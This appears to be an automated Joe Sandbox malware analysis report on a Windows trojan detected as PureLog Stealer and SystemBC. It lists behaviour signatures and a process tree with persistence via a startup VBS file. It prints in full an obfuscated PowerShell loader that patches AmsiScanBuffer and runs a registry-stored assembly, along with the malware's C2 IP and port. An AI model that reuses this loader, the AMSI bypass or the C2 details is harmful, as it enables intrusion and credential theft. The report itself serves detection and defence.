Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
vm6XYZzWOd.exe

Overview

General Information

Sample name:vm6XYZzWOd.exe
renamed because original name is a hash value
Original sample name:133fda00a490e613f3a6c511c1c660eb.exe
Analysis ID:1441717
MD5:133fda00a490e613f3a6c511c1c660eb
SHA1:e34f9f1c622a7e6d3cb34217b0935ebdaab8ebe9
SHA256:cac0056b23a93519a5f4e526e52187f37b88373c76aa065b9f895d1ecd4f4169
Tags:32exetrojan
Infos:

Detection

PureLog Stealer, SystemBC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected PureLog Stealer
Yara detected SystemBC
C2 URLs / IPs found in malware configuration
Contains functionality to compare user and computer (likely to detect sandboxes)
Contains functionality to inject code into remote processes
Creates a thread in another existing process (thread injection)
Drops VBS files to the startup folder
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Modifies the context of a thread in another process (thread injection)
Obfuscated command line found
Send many emails (e-Mail Spam)
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential WinAPI Calls Via CommandLine
Sigma detected: WScript or CScript Dropper
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to resolve many domain names, but no domain seems valid
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Yara detected Costura Assembly Loader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Connects to many different domains
Connects to several IPs in different countries
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates COM task schedule object (often to register a task for autostart)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Executes massive DNS lookups (> 100)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (may stop execution after accessing registry keys)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: Uncommon Svchost Parent Process
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Stores large binary data to the registry
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses SMTP (mail sending)
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • vm6XYZzWOd.exe (PID: 6772 cmdline: "C:\Users\user\Desktop\vm6XYZzWOd.exe" MD5: 133FDA00A490E613F3A6C511C1C660EB)
    • $77a3a3b4 (PID: 1100 cmdline: "C:\Users\user\AppData\Local\Temp\$77a3a3b4" MD5: 133FDA00A490E613F3A6C511C1C660EB)
    • $778e373e (PID: 2944 cmdline: "C:\Users\user\AppData\Local\Temp\$778e373e" MD5: 133FDA00A490E613F3A6C511C1C660EB)
  • powershell.exe (PID: 3712 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:UKPEWRGEIPej{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$diFffPduGehihq,[Parameter(Position=1)][Type]$PCksoXTjIn)$dnnozXtGtCr=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+[Char](102)+''+'l'+''+[Char](101)+''+[Char](99)+''+'t'+''+[Char](101)+'dD'+'e'+''+[Char](108)+''+[Char](101)+'g'+[Char](97)+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'n'+[Char](77)+'e'+'m'+''+'o'+'r'+[Char](121)+''+[Char](77)+''+'o'+''+'d'+''+[Char](117)+''+'l'+''+'e'+'',$False).DefineType(''+'M'+''+'y'+''+[Char](68)+''+'e'+'l'+[Char](101)+''+[Char](103)+'a'+[Char](116)+''+[Char](101)+''+[Char](84)+''+[Char](121)+''+'p'+''+[Char](101)+'','C'+[Char](108)+''+'a'+'s'+'s'+''+','+'P'+'u'+''+[Char](98)+''+'l'+''+'i'+'c'+[Char](44)+'S'+'e'+'a'+[Char](108)+''+[Char](101)+'d'+[Char](44)+''+[Char](65)+''+'n'+''+'s'+''+[Char](105)+''+[Char](67)+''+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+''+[Char](44)+'A'+'u'+''+[Char](116)+''+[Char](111)+''+'C'+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$dnnozXtGtCr.DefineConstructor('R'+[Char](84)+''+[Char](83)+''+[Char](112)+''+[Char](101)+''+[Char](99)+''+'i'+''+[Char](97)+''+[Char](108)+''+'N'+''+[Char](97)+''+[Char](109)+''+'e'+','+[Char](72)+''+'i'+''+[Char](100)+''+[Char](101)+'By'+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+'Pu'+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$diFffPduGehihq).SetImplementationFlags(''+'R'+''+[Char](117)+''+'n'+'tim'+[Char](101)+''+[Char](44)+''+[Char](77)+''+'a'+''+[Char](110)+''+'a'+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$dnnozXtGtCr.DefineMethod(''+[Char](73)+'n'+[Char](118)+''+[Char](111)+''+[Char](107)+'e','P'+[Char](117)+''+'b'+'l'+[Char](105)+''+[Char](99)+''+[Char](44)+'H'+[Char](105)+''+[Char](100)+''+[Char](101)+''+[Char](66)+'y'+[Char](83)+''+[Char](105)+''+'g'+''+','+''+[Char](78)+''+'e'+''+[Char](119)+''+'S'+''+[Char](108)+''+[Char](111)+'t,'+[Char](86)+''+[Char](105)+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+'l'+'',$PCksoXTjIn,$diFffPduGehihq).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+'i'+'m'+''+[Char](101)+','+[Char](77)+''+[Char](97)+'n'+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');Write-Output $dnnozXtGtCr.CreateType();}$lVayyyANUYcKS=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+[Char](121)+'st'+[Char](101)+''+'m'+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')}).GetType(''+[Char](77)+'i'+'c'+''+[Char](114)+'o'+'s'+''+[Char](111)+''+'f'+''+[Char](116)+''+'.'+''+[Char](87)+''+'i'+''+'n'+'3'+[Char](50)+''+[Char](46)+''+[Char](85)+'n'+[Char](115)+'af'+'e'+''+'N'+''+[Char](97)+''+[Char](116)+''+[Char](105)+''+[Char](118)+''+'e'+''+[Char](77)+''+[Char](101)+''+[Char](116)+'ho'+[Char](100)+''+[Char](115)+'');$orrkynlqKpbkhN=$lVayyyANUYcKS.GetMethod('Get'+'P'+''+[Char](114)+''+[Char](111)+''+'c'+'A'+[Char](100)+''+'d'+''+[Char](114)+'e'+[Char](115)+'s',[Reflection.BindingFlags](''+'P'+''+'u'+''+[Char](98)+''+[Char](108)+'i'+'c'+''+[Char](44)+''+'S'+''+'t'+'at'+[Char](105)+''+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$IWmJQjKZijMLKdIaBfm=UKPEWRGEIPej @([String])([IntPtr]);$TBUJedRwibzVTgzCRnDIzS=UKPEWRGEIPej @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$njrYfxNAvhQ=$lVayyyANUYcKS.GetMethod('G'+[Char](101)+'t'+'M'+''+[Char](111)+'du'+[Char](108)+''+[Char](101)+'H'+'a'+'n'+[Char](100)+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+'r'+'n'+''+[Char](101)+''+'l'+''+'3'+''+[Char](50)+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')));$MqmAuoaRJIuKTQ=$orrkynlqKpbkhN.Invoke($Null,@([Object]$njrYfxNAvhQ,[Object](''+[Char](76)+''+[Char](111)+''+[Char](97)+'d'+[Char](76)+''+[Char](105)+'b'+[Char](114)+''+[Char](97)+''+[Char](114)+''+[Char](121)+''+'A'+'')));$QrVMcatQwspWdilEg=$orrkynlqKpbkhN.Invoke($Null,@([Object]$njrYfxNAvhQ,[Object](''+[Char](86)+'i'+'r'+''+[Char](116)+''+[Char](117)+''+'a'+''+'l'+''+[Char](80)+''+[Char](114)+'o'+'t'+'e'+[Char](99)+'t')));$jNrufzt=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($MqmAuoaRJIuKTQ,$IWmJQjKZijMLKdIaBfm).Invoke(''+'a'+''+[Char](109)+''+[Char](115)+''+[Char](105)+'.'+'d'+''+'l'+''+'l'+'');$woXAbHxooZFxzUvIS=$orrkynlqKpbkhN.Invoke($Null,@([Object]$jNrufzt,[Object](''+[Char](65)+''+[Char](109)+''+'s'+''+'i'+''+[Char](83)+''+'c'+''+[Char](97)+''+[Char](110)+'B'+[Char](117)+''+'f'+''+[Char](102)+'e'+[Char](114)+'')));$DypfBWPoct=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($QrVMcatQwspWdilEg,$TBUJedRwibzVTgzCRnDIzS).Invoke($woXAbHxooZFxzUvIS,[uint32]8,4,[ref]$DypfBWPoct);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$woXAbHxooZFxzUvIS,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($QrVMcatQwspWdilEg,$TBUJedRwibzVTgzCRnDIzS).Invoke($woXAbHxooZFxzUvIS,[uint32]8,0x20,[ref]$DypfBWPoct);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'O'+'F'+''+[Char](84)+''+[Char](87)+''+[Char](65)+''+'R'+''+[Char](69)+'').GetValue('$'+[Char](55)+'7s'+'t'+'a'+[Char](103)+''+'e'+'r')).EntryPoint.Invoke($Null,$Null)" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 3228 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • dllhost.exe (PID: 4304 cmdline: C:\Windows\System32\dllhost.exe /Processid:{a7581e3a-9da7-4299-b4e9-0d87c1c78a48} MD5: 08EB78E5BE019DF044C26B14703BD1FA)
      • winlogon.exe (PID: 564 cmdline: winlogon.exe MD5: F8B41A1B3E569E7E6F990567F21DCE97)
      • lsass.exe (PID: 640 cmdline: C:\Windows\system32\lsass.exe MD5: A1CC00332BBF370654EE3DC8CDC8C95A)
        • wscript.exe (PID: 1848 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$77Kaxhwswfup.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
          • $77Kaxhwswfup.exe (PID: 7056 cmdline: "C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exe" MD5: 133FDA00A490E613F3A6C511C1C660EB)
      • svchost.exe (PID: 924 cmdline: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • dwm.exe (PID: 992 cmdline: "dwm.exe" MD5: 5C27608411832C5B39BA04E33D53536C)
      • svchost.exe (PID: 444 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 732 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1032 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1056 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1068 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1148 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1188 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1232 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1324 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s nsi MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1384 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1416 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1424 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1460 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1612 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1660 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1688 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1700 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s FontCache MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1820 cmdline: C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1836 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1936 cmdline: C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1944 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1952 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • WMIADAP.exe (PID: 4836 cmdline: wmiadap.exe /F /T /R MD5: 1BFFABBD200C850E6346820E92B915DC)
      • svchost.exe (PID: 2024 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • spoolsv.exe (PID: 2096 cmdline: C:\Windows\System32\spoolsv.exe MD5: 0D4B1E3E4488E9BDC035F23E1F4FE22F)
      • svchost.exe (PID: 2188 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 2204 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 2240 cmdline: C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
SystemBCSystemBC is a proxy malware leveraging SOCKS5. Based on screenshots used in ads on a underground marketplace, Proofpoint decided to call it SystemBC.SystemBC has been observed occasionally, but more pronounced since June 2019. First samples goes back to October 2018.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.systembc
{"NDATAHOST1": "212.162.153.199", "HOST2": "212.162.153.199", "PORT1": "4382"}
SourceRuleDescriptionAuthorStrings
00000000.00000002.2335244662.0000000007550000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
    00000000.00000002.2329340296.0000000007060000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
      00000015.00000002.2765221836.0000000004770000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
        00000015.00000002.2746243713.0000000003728000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
          00000000.00000002.2314321944.000000000699F000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
            Click to see the 17 entries
            SourceRuleDescriptionAuthorStrings
            21.2.$77Kaxhwswfup.exe.5e0cba8.9.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
              21.2.$77Kaxhwswfup.exe.38c1cd8.2.raw.unpackJoeSecurity_SystemBCYara detected SystemBCJoe Security
                21.2.$77Kaxhwswfup.exe.46d04d0.6.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                  0.2.vm6XYZzWOd.exe.3c166a4.0.raw.unpackJoeSecurity_SystemBCYara detected SystemBCJoe Security
                    6.2.$778e373e.400000.0.unpackJoeSecurity_SystemBCYara detected SystemBCJoe Security
                      Click to see the 25 entries

                      System Summary

                      barindex
                      Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:UKPEWRGEIPej{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$diFffPduGehihq,[Parameter(Position=1)][Type]$PCksoXTjIn)$dnnozXtGtCr=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+[Char](102)+''+'l'+''+[Char](101)+''+[Char](99)+''+'t'+''+[Char](101)+'dD'+'e'+''+[Char](108)+''+[Char](101)+'g'+[Char](97)+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'n'+[Char](77)+'e'+'m'+''+'o'+'r'+[Char](121)+''+[Char](77)+''+'o'+''+'d'+''+[Char](117)+''+'l'+''+'e'+'',$False).DefineType(''+'M'+''+'y'+''+[Char](68)+''+'e'+'l'+[Char](101)+''+[Char](103)+'a'+[Char](116)+''+[Char](101)+''+[Char](84)+''+[Char](121)+''+'p'+''+[Char](101)+'','C'+[Char](108)+''+'a'+'s'+'s'+''+','+'P'+'u'+''+[Char](98)+''+'l'+''+'i'+'c'+[Char](44)+'S'+'e'+'a'+[Char](108)+''+[Char](101)+'d'+[Char](44)+''+[Char](65)+''+'n'+''+'s'+''+[Char](105)+''+[Char](67)+''+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+''+[Char](44)+'A'+'u'+''+[Char](116)+''+[Char](111)+''+'C'+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$dnnozXtGtCr.DefineConstructor('R'+[Char](84)+''+[Char](83)+''+[Char](112)+''+[Char](101)+''+[Char](99)+''+'i'+''+[Char](97)+''+[Char](108)+''+'N'+''+[Char](97)+''+[Char](109)+''+'e'+','+[Char](72)+''+'i'+''+[Char](100)+''+[Char](101)+'By'+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+'Pu'+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$diFffPduGehihq).SetImplementationFlags(''+'R'+''+[Char](117)+''+'n'+'tim'+[Char](101)+''+[Char](44)+''+[Char](77)+''+'a'+''+[Char](110)+''+'a'+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$dnnozXtGtCr.DefineMethod(''+[Char](73)+'n'+[Char](118)+''+[Char](111)+''+[Char](107)+'e','P'+[Char](117)+''+'b'+'l'+[Char](105)+''+[Char](99)+''+[Char](44)+'H'+[Char](105)+''+[Char](100)+''+[Char](101)+''+[Char](66)+'y'+[Char](83)+''+[Char](105)+''+'g'+''+','+''+[Char](78)+''+'e'+''+[Char](119)+''+'S'+''+[Char](108)+''+[Char](111)+'t,'+[Char](86)+''+[Char](105)+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+'l'+'',$PCksoXTjIn,$diFffPduGehihq).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+'i'+'m'+''+[Char](101)+','+[Char](77)+''+[Char](97)+'n'+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');Write-Output $dnnozXtGtCr.CreateType();}$lVayyyANUYcKS=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+[Char](121)+'st'+[Char](101)+''+'m'+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')}).GetType(''+[Char](77)+'i'+'c'+''+[Char](114)+'o'+'s'+''+[Char](111)+''+'f'+''+[Char](116)+''+'.'+''+[Char](87)+''+'i'+''+'n'+'3'+[Char](50)+''+[Char](46)+''+[Char](85)+'n'+[Char](115)+'af'+'e'+''+'N'+''+[Char](97
                      Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:UKPEWRGEIPej{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$diFffPduGehihq,[Parameter(Position=1)][Type]$PCksoXTjIn)$dnnozXtGtCr=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+[Char](102)+''+'l'+''+[Char](101)+''+[Char](99)+''+'t'+''+[Char](101)+'dD'+'e'+''+[Char](108)+''+[Char](101)+'g'+[Char](97)+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'n'+[Char](77)+'e'+'m'+''+'o'+'r'+[Char](121)+''+[Char](77)+''+'o'+''+'d'+''+[Char](117)+''+'l'+''+'e'+'',$False).DefineType(''+'M'+''+'y'+''+[Char](68)+''+'e'+'l'+[Char](101)+''+[Char](103)+'a'+[Char](116)+''+[Char](101)+''+[Char](84)+''+[Char](121)+''+'p'+''+[Char](101)+'','C'+[Char](108)+''+'a'+'s'+'s'+''+','+'P'+'u'+''+[Char](98)+''+'l'+''+'i'+'c'+[Char](44)+'S'+'e'+'a'+[Char](108)+''+[Char](101)+'d'+[Char](44)+''+[Char](65)+''+'n'+''+'s'+''+[Char](105)+''+[Char](67)+''+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+''+[Char](44)+'A'+'u'+''+[Char](116)+''+[Char](111)+''+'C'+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$dnnozXtGtCr.DefineConstructor('R'+[Char](84)+''+[Char](83)+''+[Char](112)+''+[Char](101)+''+[Char](99)+''+'i'+''+[Char](97)+''+[Char](108)+''+'N'+''+[Char](97)+''+[Char](109)+''+'e'+','+[Char](72)+''+'i'+''+[Char](100)+''+[Char](101)+'By'+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+'Pu'+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$diFffPduGehihq).SetImplementationFlags(''+'R'+''+[Char](117)+''+'n'+'tim'+[Char](101)+''+[Char](44)+''+[Char](77)+''+'a'+''+[Char](110)+''+'a'+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$dnnozXtGtCr.DefineMethod(''+[Char](73)+'n'+[Char](118)+''+[Char](111)+''+[Char](107)+'e','P'+[Char](117)+''+'b'+'l'+[Char](105)+''+[Char](99)+''+[Char](44)+'H'+[Char](105)+''+[Char](100)+''+[Char](101)+''+[Char](66)+'y'+[Char](83)+''+[Char](105)+''+'g'+''+','+''+[Char](78)+''+'e'+''+[Char](119)+''+'S'+''+[Char](108)+''+[Char](111)+'t,'+[Char](86)+''+[Char](105)+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+'l'+'',$PCksoXTjIn,$diFffPduGehihq).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+'i'+'m'+''+[Char](101)+','+[Char](77)+''+[Char](97)+'n'+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');Write-Output $dnnozXtGtCr.CreateType();}$lVayyyANUYcKS=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+[Char](121)+'st'+[Char](101)+''+'m'+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')}).GetType(''+[Char](77)+'i'+'c'+''+[Char](114)+'o'+'s'+''+[Char](111)+''+'f'+''+[Char](116)+''+'.'+''+[Char](87)+''+'i'+''+'n'+'3'+[Char](50)+''+[Char](46)+''+[Char](85)+'n'+[Char](115)+'af'+'e'+''+'N'+''+[Char](97
                      Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$77Kaxhwswfup.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$77Kaxhwswfup.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: C:\Windows\system32\lsass.exe, ParentImage: C:\Windows\System32\lsass.exe, ParentProcessId: 640, ParentProcessName: lsass.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$77Kaxhwswfup.vbs" , ProcessId: 1848, ProcessName: wscript.exe
                      Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: "C:\Users\user\AppData\Local\Temp\$77a3a3b4", CommandLine: "C:\Users\user\AppData\Local\Temp\$77a3a3b4", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\$77a3a3b4, NewProcessName: C:\Users\user\AppData\Local\Temp\$77a3a3b4, OriginalFileName: C:\Users\user\AppData\Local\Temp\$77a3a3b4, ParentCommandLine: "C:\Users\user\Desktop\vm6XYZzWOd.exe", ParentImage: C:\Users\user\Desktop\vm6XYZzWOd.exe, ParentProcessId: 6772, ParentProcessName: vm6XYZzWOd.exe, ProcessCommandLine: "C:\Users\user\AppData\Local\Temp\$77a3a3b4", ProcessId: 1100, ProcessName: $77a3a3b4
                      Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 193.122.179.25, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\AppData\Local\Temp\$778e373e, Initiated: true, ProcessId: 2944, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49716
